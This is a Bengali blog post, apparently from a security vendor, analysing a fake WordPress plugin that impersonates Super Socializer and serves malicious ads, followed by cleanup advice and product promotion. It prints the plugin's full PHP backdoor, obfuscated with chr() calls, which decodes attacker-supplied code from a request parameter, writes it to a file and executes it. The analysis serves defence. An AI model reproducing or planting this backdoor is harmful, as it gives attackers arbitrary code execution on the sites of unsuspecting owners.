প্রায়ই হ্যাক করা ওয়েবসাইটে অ্যাস্ট্রা সিকিউরিটি ইঞ্জিনিয়াররা জাল ইনস্টল করা প্লাগইন খুঁজে পান। যা ফেক সুপার সোশ্যালাইজার প্লাগইন নামে ওয়ার্ডপ্রেসে দেখা যায়। এই জাল প্লাগইনটি ওয়েবসাইটে জাল এবং খারাপ বিজ্ঞাপনগুলিকে ট্রিগার করে৷ ম্যালওয়্যার ক্লিনআপ এই জাল প্লাগইন উন্মোচিত করেছে “সুপার সোশ্যাল্যাট“নামে। যা স্পষ্টতই সুপার সোশ্যালাইজার নামের একটি নাটক বলে ধারনা করা হয়।
আমরা সুপার সোশ্যাল্যাট সম্পর্কে নিয়ে বিস্তারিত আলোচনা করব (অবস্থান, কোড, ইত্যাদি)। প্রথমে, আমরা আপনাকে মূল প্লাগইনের একটি ছোট উদাহরন দিই। যেখানে সুপার সোশ্যালাইজার হল একটি প্লাগইন যা সহজে সামাজিক লগইন এবং সামাজিক শেয়ারিং সহ ওয়েবসাইটগুলিকে সাহায্য করে৷ আমরা যখন এই লিখাটি লিখছি সেই সময়, এটিতে 60,000+ সক্রিয় ইনস্টলেশন রয়েছে।
প্রযুক্তিগত বিবরণ: ফেক সুপার সোশ্যালাইজার প্লাগইন
সুপার সোশ্যাল্যাট প্লাগইন আপনার প্লাগইন তালিকাটি নিম্নরূপ বলে মনে করা হয়।
প্লাগইনের ভিতরে তালিকাভুক্ত ফাইলগুলি হল:
আমাদের নিরাপত্তা গবেষক খুঁজে পেয়েছেন যে জাল প্লাগইনটি wp-content/plugins/super-socialat/super_socialat.php এর মাধ্যমে দক্ষতার সাথে লুকানো ছিল।
একটি পরীক্ষায় দেখা যায়, তারা ওয়েবসাইটে নিম্নলিখিত ক্ষতিকারক কোডগুলি ইনজেক্ট করেছে :
<?php
/*
Plugin Name: Super Socialat
Plugin URI: https://super-socializer-wordpress.heateor.com
Description: A complete 360 degree solution to provide all the social features like Social Login, Social Commenting, Social Sharing, Social Media follow and more.
Version: 7.12.5
Author: Team Heateor
Author URI: https://www.heateor.com
Text Domain: super-socialat
Domain Path: /languages
License: GPL2+
*/
$a = chr(95).chr(116).chr(101).chr(109).chr(112).chr(108).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110);$c = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$d = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$f = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);$b = $f.$d($_REQUEST[chr(100).chr(49)]);@array_diff_ukey(@array((string)($a) => 1), @array((string)($b) => 2), $c);@include($a);@unlink($a);
জাল বিজ্ঞাপন এর বিরুদ্ধে আপনি কি করতে পারেন?
আপনি যদি আপনার সাইটে জাল বিজ্ঞাপন/ico ফাইলগুলিও দেখে থাকেন তবে আপনি কিছু পদক্ষেপ গ্রহণ করতে পারেন।
আপনার প্লাগইন তালিকা পরীক্ষা করুন
প্রথমেই, আপনার প্লাগইনগুলির একটি ম্যানুয়াল চেক শুরু করুন। নিশ্চিত করুন যে সুপার সোশ্যাল্যাট নাম দ্বারা কোন প্লাগইন নেই। যদি তা আপনার ওয়েবসাইটে ইনস্টল করা হয়, অথবা আপনি যদি প্লাগইনটি খুঁজে পান, তাহলে অবিলম্বে এটি সরিয়ে ফেলুন।
ফেক ইউজার অ্যাকাউন্ট চেক করুন
এসব ক্ষেত্রে আমরা অনেক ভুয়া অ্যাকাউন্টও তৈরি হতে দেখেছি। হ্যাকাররা সাধারণত হ্যাক করা সাইটগুলিতে তাদের অ্যাক্সেস দীর্ঘায়িত করার একটি উপায় অবলম্বন করে। ভুয়া ব্যবহারকারী অ্যাকাউন্ট তৈরি করা তাদের মধ্যে একটি।
হ্যাক চেক করতে চাইলে, আপনার ওয়েবসাইটে ব্যবহারকারী অ্যাকাউন্ট পর্যালোচনা করুন। কারন আপনার ডাটাবেসের wp_users টেবিল পর্যালোচনা করা হয় জাল অ্যাকাউন্ট সনাক্ত করতে । এছাড়াও তাদের অপসারণেও সাহায্য করতে পারে।
আমরা এখানে বিশেষভাবে উল্লেখ করতে চাই যে, শুধুমাত্র জাল প্লাগইন মুছে ফেলাই একমাত্র সমাধান নয়। আপনাকে বুঝতে হবে যে, হ্যাকার কিছু দুর্বলতার কারণে এই প্লাগইনটি সন্নিবেশ করতে সক্ষম হয়েছিল। অতএব, আপনাকে আপনার ওয়ার্ডপ্রেসের একটি সঠিক ম্যালওয়্যার ক্লিনআপ করতে হবে।
এছাড়াও আপনি ধাপে ধাপে ওয়ার্ডপ্রেস ম্যালওয়্যার অপসারণের নির্দেশিকা উল্লেখ করতে পারেন।
সতর্ক থাকাই নিরাপত্তার চাবিকাঠি
ওয়ার্ডপ্রেস ব্যবহারকারীদের সমস্ত প্লাগইনগুলি ইন্সটল করার আগে দুবার চেক করার পরামর্শ দেওয়া হচ্ছে। যদি আপনার ওয়েবসাইটটিও ভিন্ন আচরণ করে থাকে, এখান থেকে একটি ম্যালওয়্যার ক্লিনআপ অনুরোধ উত্থাপন করুন। আমাদের নিরাপত্তা বিশেষজ্ঞরা মাত্র 4-6 ঘন্টার মধ্যে সংক্রমণ পরিষ্কার করতে পারবে।
আপনি যদি সংক্রমণ সম্পর্কে নিশ্চিত না হন, বিনামূল্যে অনলাইন চেক করুন।
আপনার সাইট যদি হ্যাক না হয়ে থাকে, তাহলে দুর্বল হয়ে আক্রমণের ঝুঁকি নেবেন না। আপনার ওয়েবসাইট সুরক্ষিত করার ব্যাপারে নিশ্চিত হতে পারেন। এখানে সবচেয়ে সহজ উপায় হল, একটি বিশ্বস্ত প্লাগইন ইনস্টল করুন আপনার ওয়েবসাইটের জন্য। Astra দ্বারা WP শক্ত করা সম্ভব, যা আপনার জন্য নিরাপত্তা অডিট এবং ফিক্সিং স্বয়ংক্রিয় করে। এখন একটি ক্লিকের মাধ্যমে আপনি আপনার ওয়েবসাইটের 12টিরও বেশি গুরুত্বপূর্ণ দিকগুলি সুরক্ষিত করতে পারেন৷
আপনি যদি চান আপনার ওয়েবসাইট এই হ্যাক এবং আরও অনেক আক্রমন থেকে সুরক্ষিত হোক তাহলে বিনামুল্যে এখান থেকে WP Hardening ইন্সটল করুন।
আপনার ওয়েবসাইট সম্পর্কে কোন উদ্বেগ আছে, নীচে মন্তব্য করুন বা যোগাযোগ করুন। আমরা উত্তর দেওয়ার প্রতিশ্রুতি দিচ্ছি।